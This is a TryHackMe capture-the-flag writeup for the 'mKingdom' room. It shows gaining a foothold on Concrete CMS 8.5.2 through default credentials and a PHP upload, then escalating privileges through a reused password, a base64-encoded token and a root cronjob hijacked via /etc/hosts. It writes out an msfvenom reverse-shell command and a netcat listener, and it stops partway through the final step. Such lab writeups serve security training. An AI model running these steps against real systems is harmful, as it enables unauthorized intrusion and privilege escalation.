“mKingdom” TryHackMe Writeup

Ahmet AKYAZILI

7 min readJun 15, 2024

https://tryhackme.com/r/room/mkingdom

Today we will solve the tryhackme room called mKingdom together.

NMAP Scan

As always, we start off with an NMAP scan:

Only one open port — 85, and it’s running http.

Let’s take a look at the website:

Nothing here and nothing in the source code as well.

And dirb scan:

Dirb locates the /app directory, let’s take a closer look:

We see a single button here, clicking on it pops up an alert:

After we hit “OK”, we are redirected to “/app/castle” .

The wappalyzer browser add-on identifies this as “Concrete CMS 8.5.2” :

The next step, would be to search for any known exploits for this version of Concrete:

The first result reveals a RCE vulnerability, let’s check that out:

Bingo, the version is the exact one that is used on this website. However, it seems like we need to take-over the admin account first in order for the exploit to work.

Let’s see if we can identify the location of the login page.

If you scroll all the way down to the bottom of the page, you will see a link to the login page:

I tried to search for default credentials for concrete CMS. However, there is a default username : “admin” :

I decided to try some common credentials like “admin:admin”

and “admin:password” .

“admin:password” we get logged in:

Now, let’s go back to the exploit and understand how it works:

To summarize, we need to make sure that we are allowed to upload PHP files, then upload a PHP reverse shell and navigate to it to execute it!

First, Go to “System & Settings” on the sidebar to the right of the screen: Next, go to under “Files” “Allowed file types” :

Add “php” to the Allowed File Types:

Hit “Save” and navigate to “Files” on the side-bar:

And hit “upload files”:

Now we need to generate our PHP shell (I will paste full PHP shell below) or with Metasploit’s Msfvenom we can generate it with following command:

msfvenom -p php/reverse_php LHOST=Attacker Machine IP LPORT=1234 > shell.php):

After you hit close, you will be provided with a link to the php file:

Make sure you have a listener ready “ nc -nvlp 1234 “ , and click on the link:

And we have shell on the machine!

Privilege Escalation

First, we install the “linpeas” application to the /temp folder with the wget command.

Let’s see what other users exist;

We have the users root, mario and toad.

Let’s see if we can find a way to escalate to one of these users.

Looking around, I end up finding the file in linpeas Backup Manager files

/var/www/html/app/castle/application/config/database.php:

We find a clear-text password.The username for the connection is “toad”, and we know that there is a user on the machine that goes by the same name, so maybe he re-used his password?

Bingo! privilege escalation is done.

Toad to Mario

I ran linpeas again, and noticed something weird in the environmental variables of toad:

PWD_token is interesting…

The value is encoded with Cybechef what looks like base64, so we can decode it:

We have another password!

We can switch users to mario with this password:

Mario to ROOT

For the next step, we download the “pspy” application from the following address, install it on the victim computer and run it.

https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64

This is a tool that allows you to monitor linux processes in real time without requiring root privileges. This could allow us to spot clear-text passwords passed as command arguements, hidden cronjobs, etc.

If we run the tool on the machine and wait for a few minutes, we will see that there is a cronjob running as root every minute:

It seems like every minute, a file by the name of “counter.sh” gets pulled from mkingdom.thm , and executed with bash.

To exploit this, we would either need permissions to modify counter.sh or modify the /etc/hosts file:

We don’t have permission to modify counter.sh

But we do have permission to modify /etc/hosts

/etc/hosts acts as the local DNS mapping of the linux server.

Before the server reaches out to any DNS servers to resolve a domain like

“mkingdom.thm” , it checks whether there is an entry for that domain at /etc/hosts.

So, by modifying /etc/hosts to make it so mkingdom.thm is mapped to our kali machine, we can make the cronjob pull the counter.sh script from our kali machine and execute it with bash!

First, let’s modify /etc/hosts: